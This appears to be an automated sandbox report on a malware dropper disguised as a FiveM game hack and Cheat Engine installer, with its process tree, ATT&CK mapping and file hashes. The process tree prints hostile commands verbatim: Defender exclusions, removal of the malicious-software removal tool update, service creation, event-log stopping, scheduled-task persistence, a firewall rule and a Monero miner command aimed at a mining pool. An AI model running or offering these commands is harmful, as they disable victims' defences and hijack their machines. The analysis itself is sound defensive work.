daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794	CheatEngine75.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6	CheatEngine75.tmp

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2920	schtasks.exe

Script User-Agent 1 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	11	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 56 IoCs

pid	Process
536	build.exe
2132	powershell.exe
536	build.exe
536	build.exe
536	build.exe
536	build.exe
536	build.exe
2016	dlpwxhhxvcgc.exe
2116	powershell.exe
2016	dlpwxhhxvcgc.exe
2016	dlpwxhhxvcgc.exe
2016	dlpwxhhxvcgc.exe
2792	powershell.exe
2376	conhost.exe
2036	powershell.exe
2088	conhost.exe
2088	conhost.exe
2400	powershell.exe
2012	powershell.exe
1984	svchost.exe
1984	svchost.exe
1984	svchost.exe
1984	svchost.exe
2952	CheatEngine75.tmp
2952	CheatEngine75.tmp
2952	CheatEngine75.tmp
2952	CheatEngine75.tmp
2952	CheatEngine75.tmp
2952	CheatEngine75.tmp
2952	CheatEngine75.tmp
2952	CheatEngine75.tmp
2952	CheatEngine75.tmp
2952	CheatEngine75.tmp
2952	CheatEngine75.tmp
2952	CheatEngine75.tmp
2952	CheatEngine75.tmp
2952	CheatEngine75.tmp
2952	CheatEngine75.tmp
2952	CheatEngine75.tmp
2952	CheatEngine75.tmp
2952	CheatEngine75.tmp
2952	CheatEngine75.tmp
1984	svchost.exe
1984	svchost.exe
1984	svchost.exe
1984	svchost.exe
1984	svchost.exe
1984	svchost.exe
1984	svchost.exe
1984	svchost.exe
1984	svchost.exe
1984	svchost.exe
1984	svchost.exe
1984	svchost.exe
1984	svchost.exe
1984	svchost.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
464	Process not Found

Suspicious use of AdjustPrivilegeToken 38 IoCs

description	pid	Process
Token: SeDebugPrivilege	2956	Windows Defender.exe
Token: 33	2956	Windows Defender.exe
Token: SeIncBasePriorityPrivilege	2956	Windows Defender.exe
Token: SeDebugPrivilege	2132	powershell.exe
Token: 33	2956	Windows Defender.exe
Token: SeIncBasePriorityPrivilege	2956	Windows Defender.exe
Token: SeDebugPrivilege	2116	powershell.exe
Token: 33	2956	Windows Defender.exe
Token: SeIncBasePriorityPrivilege	2956	Windows Defender.exe
Token: SeLockMemoryPrivilege	3036	svchost.exe
Token: 33	2956	Windows Defender.exe
Token: SeIncBasePriorityPrivilege	2956	Windows Defender.exe
Token: SeDebugPrivilege	2376	conhost.exe
Token: SeDebugPrivilege	2792	powershell.exe
Token: SeDebugPrivilege	2036	powershell.exe
Token: 33	2956	Windows Defender.exe
Token: SeIncBasePriorityPrivilege	2956	Windows Defender.exe
Token: 33	2956	Windows Defender.exe
Token: SeIncBasePriorityPrivilege	2956	Windows Defender.exe
Token: SeDebugPrivilege	2088	conhost.exe
Token: SeDebugPrivilege	2400	powershell.exe
Token: SeDebugPrivilege	2012	powershell.exe
Token: 33	2956	Windows Defender.exe
Token: SeIncBasePriorityPrivilege	2956	Windows Defender.exe
Token: SeLockMemoryPrivilege	1984	svchost.exe
Token: SeLockMemoryPrivilege	1984	svchost.exe
Token: 33	2956	Windows Defender.exe
Token: SeIncBasePriorityPrivilege	2956	Windows Defender.exe
Token: 33	2956	Windows Defender.exe
Token: SeIncBasePriorityPrivilege	2956	Windows Defender.exe
Token: 33	2956	Windows Defender.exe
Token: SeIncBasePriorityPrivilege	2956	Windows Defender.exe
Token: 33	2956	Windows Defender.exe
Token: SeIncBasePriorityPrivilege	2956	Windows Defender.exe
Token: 33	2956	Windows Defender.exe
Token: SeIncBasePriorityPrivilege	2956	Windows Defender.exe
Token: 33	2956	Windows Defender.exe
Token: SeIncBasePriorityPrivilege	2956	Windows Defender.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2952	CheatEngine75.tmp

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2604 wrote to memory of 2392	2604	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab0546302ccd036571e8c.exe	29
PID 2604 wrote to memory of 2392	2604	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab0546302ccd036571e8c.exe	29
PID 2604 wrote to memory of 2392	2604	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab0546302ccd036571e8c.exe	29
PID 2604 wrote to memory of 2392	2604	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab0546302ccd036571e8c.exe	29
PID 2392 wrote to memory of 2956	2392	Server.exe	30
PID 2392 wrote to memory of 2956	2392	Server.exe	30
PID 2392 wrote to memory of 2956	2392	Server.exe	30
PID 2392 wrote to memory of 2956	2392	Server.exe	30
PID 2604 wrote to memory of 536	2604	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab0546302ccd036571e8c.exe	31
PID 2604 wrote to memory of 536	2604	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab0546302ccd036571e8c.exe	31
PID 2604 wrote to memory of 536	2604	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab0546302ccd036571e8c.exe	31
PID 2604 wrote to memory of 536	2604	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab0546302ccd036571e8c.exe	31
PID 2956 wrote to memory of 2684	2956	Windows Defender.exe	32
PID 2956 wrote to memory of 2684	2956	Windows Defender.exe	32
PID 2956 wrote to memory of 2684	2956	Windows Defender.exe	32
PID 2956 wrote to memory of 2684	2956	Windows Defender.exe	32
PID 2432 wrote to memory of 1732	2432	cmd.exe	42
PID 2432 wrote to memory of 1732	2432	cmd.exe	42
PID 2432 wrote to memory of 1732	2432	cmd.exe	42
PID 2604 wrote to memory of 1764	2604	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab0546302ccd036571e8c.exe	46
PID 2604 wrote to memory of 1764	2604	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab0546302ccd036571e8c.exe	46
PID 2604 wrote to memory of 1764	2604	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab0546302ccd036571e8c.exe	46
PID 2604 wrote to memory of 1764	2604	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab0546302ccd036571e8c.exe	46
PID 2016 wrote to memory of 3044	2016	dlpwxhhxvcgc.exe	52
PID 2016 wrote to memory of 3044	2016	dlpwxhhxvcgc.exe	52
PID 2016 wrote to memory of 3044	2016	dlpwxhhxvcgc.exe	52
PID 2016 wrote to memory of 3044	2016	dlpwxhhxvcgc.exe	52
PID 2016 wrote to memory of 3044	2016	dlpwxhhxvcgc.exe	52
PID 2016 wrote to memory of 3044	2016	dlpwxhhxvcgc.exe	52
PID 2016 wrote to memory of 3044	2016	dlpwxhhxvcgc.exe	52
PID 2016 wrote to memory of 3044	2016	dlpwxhhxvcgc.exe	52
PID 2016 wrote to memory of 3044	2016	dlpwxhhxvcgc.exe	52
PID 2016 wrote to memory of 3036	2016	dlpwxhhxvcgc.exe	54
PID 2016 wrote to memory of 3036	2016	dlpwxhhxvcgc.exe	54
PID 2016 wrote to memory of 3036	2016	dlpwxhhxvcgc.exe	54
PID 2016 wrote to memory of 3036	2016	dlpwxhhxvcgc.exe	54
PID 2016 wrote to memory of 3036	2016	dlpwxhhxvcgc.exe	54
PID 928 wrote to memory of 2384	928	cmd.exe	55
PID 928 wrote to memory of 2384	928	cmd.exe	55
PID 928 wrote to memory of 2384	928	cmd.exe	55
PID 1764 wrote to memory of 2376	1764	FiveM.exe	57
PID 1764 wrote to memory of 2376	1764	FiveM.exe	57
PID 1764 wrote to memory of 2376	1764	FiveM.exe	57
PID 1764 wrote to memory of 2376	1764	FiveM.exe	57
PID 2604 wrote to memory of 288	2604	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab0546302ccd036571e8c.exe	58
PID 2604 wrote to memory of 288	2604	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab0546302ccd036571e8c.exe	58
PID 2604 wrote to memory of 288	2604	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab0546302ccd036571e8c.exe	58
PID 2604 wrote to memory of 288	2604	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab0546302ccd036571e8c.exe	58
PID 2604 wrote to memory of 1760	2604	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab0546302ccd036571e8c.exe	60
PID 2604 wrote to memory of 1760	2604	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab0546302ccd036571e8c.exe	60
PID 2604 wrote to memory of 1760	2604	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab0546302ccd036571e8c.exe	60
PID 2604 wrote to memory of 1760	2604	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab0546302ccd036571e8c.exe	60
PID 1760 wrote to memory of 2640	1760	FiveM Hack.exe	61
PID 1760 wrote to memory of 2640	1760	FiveM Hack.exe	61
PID 1760 wrote to memory of 2640	1760	FiveM Hack.exe	61
PID 2376 wrote to memory of 2256	2376	conhost.exe	62
PID 2376 wrote to memory of 2256	2376	conhost.exe	62
PID 2376 wrote to memory of 2256	2376	conhost.exe	62
PID 2256 wrote to memory of 2792	2256	cmd.exe	64
PID 2256 wrote to memory of 2792	2256	cmd.exe	64
PID 2256 wrote to memory of 2792	2256	cmd.exe	64
PID 2376 wrote to memory of 2688	2376	conhost.exe	65
PID 2376 wrote to memory of 2688	2376	conhost.exe	65
PID 2376 wrote to memory of 2688	2376	conhost.exe	65

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\461fdcdb19845c43f5b6e7539071b752a07b272cf50ab0546302ccd036571e8c.exe
"C:\Users\Admin\AppData\Local\Temp\461fdcdb19845c43f5b6e7539071b752a07b272cf50ab0546302ccd036571e8c.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2604
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\Server.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Server.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2392
- - C:\Users\Admin\AppData\Roaming\Windows Defender.exe
    "C:\Users\Admin\AppData\Roaming\Windows Defender.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2956
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\Windows Defender.exe" "Windows Defender.exe" ENABLE
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      System Location Discovery: System Language Discovery
      PID:2684
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\build.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\build.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  PID:536
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2132
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2432
  - - C:\Windows\system32\wusa.exe
      wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      Drops file in Windows directory
      PID:1732
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "PVYZKASM"
    3⤵
    - Launches sc.exe
    PID:2448
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "PVYZKASM" binpath= "C:\ProgramData\kmmnqxgtotnx\dlpwxhhxvcgc.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:2336
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:900
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "PVYZKASM"
    3⤵
    - Launches sc.exe
    PID:1292
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\FiveM.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\FiveM.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1764
- - C:\Windows\System32\conhost.exe
    "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\FiveM.exe"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2376
  - - C:\Windows\System32\cmd.exe
      "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2256
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2792
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2036
  - - C:\Windows\System32\cmd.exe
      "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"
      4⤵
      PID:2688
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2920
  - - C:\Windows\System32\cmd.exe
      "cmd" cmd /c "C:\Users\Admin\AppData\Local\Temp\services64.exe"
      4⤵
      Loads dropped DLL
      PID:1996
    - - C:\Users\Admin\AppData\Local\Temp\services64.exe
        
        C:\Users\Admin\AppData\Local\Temp\services64.exe
        5⤵
        Executes dropped EXE
        
        PID:1012
      - C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\services64.exe"
        6⤵
        Loads dropped DLL
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2088
        
        C:\Windows\System32\cmd.exe
        
        "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
        7⤵
        
        PID:2424
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
        8⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2400
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
        8⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2012
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        7⤵
        Executes dropped EXE
        
        PID:1036
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "/sihost64"
        8⤵
        
        PID:2728
        
        C:\Windows\System32\svchost.exe
        
        C:\Windows/System32\svchost.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:443 --user=44tR22o4E8HYHFrMJeXruQYqEwLuXTGwiGHa2P5S6CPReNh6TC1z3p3HSC97upDwboECfSVrPD2LzGYortC66JuTFuvjMGb --pass=x --cpu-max-threads-hint=70 --cinit-kill-targets="" --tls --cinit-kill
        7⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1984
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\Rename_Z60IHLDjO6.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Rename_Z60IHLDjO6.exe"
  2⤵
  - Executes dropped EXE
  PID:288
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\FiveM Hack.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\FiveM Hack.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1760
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\FiveM Hack.exe
    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\FiveM Hack.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:2640
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\CheatEngine75.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\CheatEngine75.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:2448
- - C:\Users\Admin\AppData\Local\Temp\is-UBV4U.tmp\CheatEngine75.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-UBV4U.tmp\CheatEngine75.tmp" /SL5="$901E8,2335682,780800,C:\Users\Admin\AppData\Local\Temp\RarSFX0\CheatEngine75.exe"
    3⤵
    - Downloads MZ/PE file
    - Executes dropped EXE
    - Loads dropped DLL
    - Checks for any installed AV software in registry
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    - Modifies system certificate store
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    PID:2952

C:\ProgramData\kmmnqxgtotnx\dlpwxhhxvcgc.exe
C:\ProgramData\kmmnqxgtotnx\dlpwxhhxvcgc.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2016
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2116
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:928
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    - Drops file in Windows directory
    PID:2384
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:3044
- C:\Windows\system32\svchost.exe
  svchost.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3036

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Query Registry

T1012

Software Discovery

T1518

Security Software Discovery

T1518.001

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
8a0b06a747c7c369a7fc08fa1a8fe0df

SHA1
4e7f54c2cc145e59dec6b353bf44991a78d2a4d2

SHA256
c7ef6a41a386eec3df2f49dc04c03ce1fee86f0ea308bf504839f950abf96aa7

SHA512
2d7553408c68181ef5e3cee5d6a2445f792d3b13d9c467052e54b88e0eb05c4241a790c469ad3293f53cd9f34367fcbdb70186d2d0442276c7d5fc808cf749c5

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab8BA.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\FiveM Hack.exe

Filesize
7.7MB

MD5
ba7b34118537e3039ca82869140ed975

SHA1
c2d32b0570cb42fd0c23610b1514a4655783ba10

SHA256
22f6bc2477f06b718b25cb73b8446a80b27d1f8d389b7629a87c8c65fb51416c

SHA512
9c7a1b84b118c5bd95147e9822c4a8c9bbf9f1a08d9acf50e42b53a20718aaf72c4a388d93c31027b8d1552230ba2c05c3b5b7191e05833e416fed0cb34b56a5

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\FiveM.exe

Filesize
29.8MB

MD5
00ce1e4793d5a4876cbb00df76e58e8c

SHA1
872387a2e9125ffe3e173fbae32280b423c5c128

SHA256
36e8a050ec80df43c8fec1cea5cde9fbb09f432ec58848399dd666a992948679

SHA512
df73de1b15f1b291af87387decc436139b52e262ef7b3500124d9e920fb1af4b99632320e0b48211b9b2151b1fcb3f4aff61ac7c2dbd6de92699dfcd11444e47

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Rename_Z60IHLDjO6.exe

Filesize
37.2MB

MD5
62b8cb69f7c3ce2c5a843a8fa66b580f

SHA1
5f0440dface4bb25bbe3ee0a7dc7223b36eca37a

SHA256
8c586ec7de39427fa8fc2480c10eb2e04728793e2033e3103ed140f1b4cfb535

SHA512
ffc19d8d3f5cd6be99065203e5fc59ad993122c9bab91c243f62390e2aff6b710a63fe0c84776822fcd5ab195eb6cfa94ed7275d0ba336d50fa32afb26141e9c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar8FB.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI17602\api-ms-win-core-file-l1-2-0.dll

Filesize
21KB

MD5
1c58526d681efe507deb8f1935c75487

SHA1
0e6d328faf3563f2aae029bc5f2272fb7a742672

SHA256
ef13dce8f71173315dfc64ab839b033ab19a968ee15230e9d4d2c9d558efeee2

SHA512
8edb9a0022f417648e2ece9e22c96e2727976332025c3e7d8f15bcf6d7d97e680d1bf008eb28e2e0bd57787dcbb71d38b2deb995b8edc35fa6852ab1d593f3d1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI17602\api-ms-win-core-localization-l1-2-0.dll

Filesize
21KB

MD5
724223109e49cb01d61d63a8be926b8f

SHA1
072a4d01e01dbbab7281d9bd3add76f9a3c8b23b

SHA256
4e975f618df01a492ae433dff0dd713774d47568e44c377ceef9e5b34aad1210

SHA512
19b0065b894dc66c30a602c9464f118e7f84d83010e74457d48e93aaca4422812b093b15247b24d5c398b42ef0319108700543d13f156067b169ccfb4d7b6b7c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI17602\api-ms-win-core-timezone-l1-1-0.dll

Filesize
21KB

MD5
d12403ee11359259ba2b0706e5e5111c

SHA1
03cc7827a30fd1dee38665c0cc993b4b533ac138

SHA256
f60e1751a6ac41f08e46480bf8e6521b41e2e427803996b32bdc5e78e9560781

SHA512
9004f4e59835af57f02e8d9625814db56f0e4a98467041da6f1367ef32366ad96e0338d48fff7cc65839a24148e2d9989883bcddc329d9f4d27cae3f843117d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI17602\python311.dll

Filesize
1.6MB

MD5
bb46b85029b543b70276ad8e4c238799

SHA1
123bdcd9eebcac1ec0fd2764a37e5e5476bb0c1c

SHA256
72c24e1db1ba4df791720a93ca9502d77c3738eebf8b9092a5d82aa8d80121d0

SHA512
5e993617509c1cf434938d6a467eb0494e04580ad242535a04937f7c174d429da70a6e71792fc3de69e103ffc5d9de51d29001a4df528cfffefdaa2cef4eaf31

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-I7UD9.tmp\AVAST.png

Filesize
48KB

MD5
378f74a0cbdd582d8b434b7b978ff375

SHA1
56817b18feeace3481a427a6ad8bf4e09b6663e4

SHA256
1225afda135b0bf3b5633595af4096f8c6620ebb34aa5df7c64253f03668b33d

SHA512
1d1c5394bb8fce88a26827af821abb187e9a9f09082310038bc66b7e4c133f27d101dd8c0f3291231efcf68876380d6c62b1653832d7732de2fea65a6ae2c88f

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-I7UD9.tmp\AVG_BRW.png

Filesize
29KB

MD5
0b4fa89d69051df475b75ca654752ef6

SHA1
81bf857a2af9e3c3e4632cbb88cd71e40a831a73

SHA256
60a9085cea2e072d4b65748cc71f616d3137c1f0b7eed4f77e1b6c9e3aa78b7e

SHA512
8106a4974f3453a1e894fec8939038a9692fd87096f716e5aa5895aa14ee1c187a9a9760c0d4aec7c1e0cc7614b4a2dbf9b6c297cc0f7a38ba47837bede3b296

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-I7UD9.tmp\WeatherZero.png

Filesize
29KB

MD5
9ac6287111cb2b272561781786c46cdd

SHA1
6b02f2307ec17d9325523af1d27a6cb386c8f543

SHA256
ab99cdb7d798cb7b7d8517584d546aa4ed54eca1b808de6d076710c8a400c8c4

SHA512
f998a4e0ce14b3898a72e0b8a3f7154fc87d2070badcfa98582e3b570ca83a562d5a0c95f999a4b396619db42ab6269a2bac47702597c5a2c37177441723d837

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-I7UD9.tmp\logo.png

Filesize
258KB

MD5
6b7cb2a5a8b301c788c3792802696fe8

SHA1
